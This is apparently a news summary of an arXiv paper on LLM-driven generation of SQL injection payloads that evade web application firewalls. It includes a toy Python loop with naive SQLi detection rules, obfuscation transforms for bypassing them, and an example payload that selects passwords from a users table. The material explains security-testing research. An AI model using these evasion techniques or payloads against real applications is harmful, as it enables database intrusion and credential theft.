ARTFEED — Contemporary Art Intelligence

LLM-Based Systems for Adversarial SQL Injection Generation

ai-technology · 2026-05-13

A new paper on arXiv (2605.11188) introduces two systems that use LLMs to generate adversarial SQL injection (SQLi) attacks: RADAGAS (Retrieval Augmented Generation for Adversarial SQLi) and RefleXQLi (Reflective Chain-of-Thought SQLi). Both were evaluated against ten Web Application Firewalls (WAFs) and a MySQL validator: six open-source rule-based WAFs (ModSecurity PL1-PL3 and Coraza PL1-PL3), two AI/ML-based WAFs (WAF Brain and CNN-WAF), and two commercial solutions, one of which is AWS WAF. OWASP continues to rank SQL injection among the top application-security risks, and this research leverages recent LLM advances to automate adversarial security testing.
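The paper's details aside, the general idea of an iterative bypass loop can be illustrated with a toy sketch. Everything here is an assumption for illustration: the regex "WAF", the transform list, and the `reflective_bypass` function are invented stand-ins, not the rules of ModSecurity/Coraza or the systems' actual LLM-driven mutation logic.

```python
import re

# Toy rule-based "WAF": blocks payloads matching naive SQLi signatures.
# Illustrative stand-in only -- not ModSecurity, Coraza, or any real ruleset.
BLOCK_RULES = [
    re.compile(r"(?i)\bunion\s+select\b"),
    re.compile(r"(?i)\bor\s+1\s*=\s*1\b"),
]

def waf_blocks(payload: str) -> bool:
    return any(rule.search(payload) for rule in BLOCK_RULES)

# Hypothetical obfuscation transforms of the kind an LLM-driven loop
# might propose; a real system would generate these adaptively.
TRANSFORMS = [
    lambda p: p.replace(" ", "/**/"),            # comment-based whitespace
    lambda p: re.sub(r"(?i)union", "UNIoN", p),  # case mangling
    lambda p: p.replace("1=1", "2>1"),           # tautology rewrite
]

def reflective_bypass(seed: str, max_rounds: int = 5):
    """Iteratively mutate `seed` until the toy WAF no longer blocks it."""
    candidate = seed
    for _ in range(max_rounds):
        if not waf_blocks(candidate):
            return candidate
        for transform in TRANSFORMS:
            mutated = transform(candidate)
            if not waf_blocks(mutated):
                return mutated
        candidate = TRANSFORMS[0](candidate)
    return None
```

For example, `reflective_bypass("' UNION SELECT password FROM users -- ")` returns a comment-obfuscated variant that the naive signature no longer matches, mirroring (in miniature) the generate-test-refine loop the paper evaluates at scale.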

Key facts

  • arXiv paper 2605.11188 introduces RADAGAS and RefleXQLi systems
  • Systems generate adversarial SQL injection attacks using LLMs
  • Compared against 10 WAFs and one MySQL validator
  • WAFs include ModSecurity PL1-3, Coraza PL1-3, WAF Brain, CNN-WAF, AWS WAF
  • SQL injection is a top OWASP threat
  • LLMs enable automated adversarial attack testing
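The MySQL validator in the pipeline above matters because an evasive payload is only useful if it still parses as SQL. A minimal sketch of that syntactic check, using Python's built-in sqlite3 as a stand-in for the paper's MySQL validator (the function, schema, and `EXPLAIN` trick are illustrative assumptions):

```python
import sqlite3

def is_valid_sql(query: str) -> bool:
    """Syntactic validity check using sqlite3 as a stand-in validator.
    (The paper uses a MySQL validator; sqlite3 ships with Python.)"""
    conn = sqlite3.connect(":memory:")
    # Hypothetical schema so column/table references resolve.
    conn.execute("CREATE TABLE users (id INTEGER, password TEXT)")
    try:
        # EXPLAIN forces parsing/planning without executing the query.
        conn.execute("EXPLAIN " + query)
        return True
    except sqlite3.Error:
        return False
    finally:
        conn.close()
```

A comment-obfuscated payload such as `SELECT/**/password/**/FROM/**/users` still passes this check, while a mangled one like `SELEKT password FROM` does not, so the validator filters out mutations that break the query.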

Entities

Institutions

  • Open Worldwide Application Security Project (OWASP)
  • arXiv

Products

  • ModSecurity
  • Coraza
  • WAF Brain
  • CNN-WAF
  • AWS WAF

Sources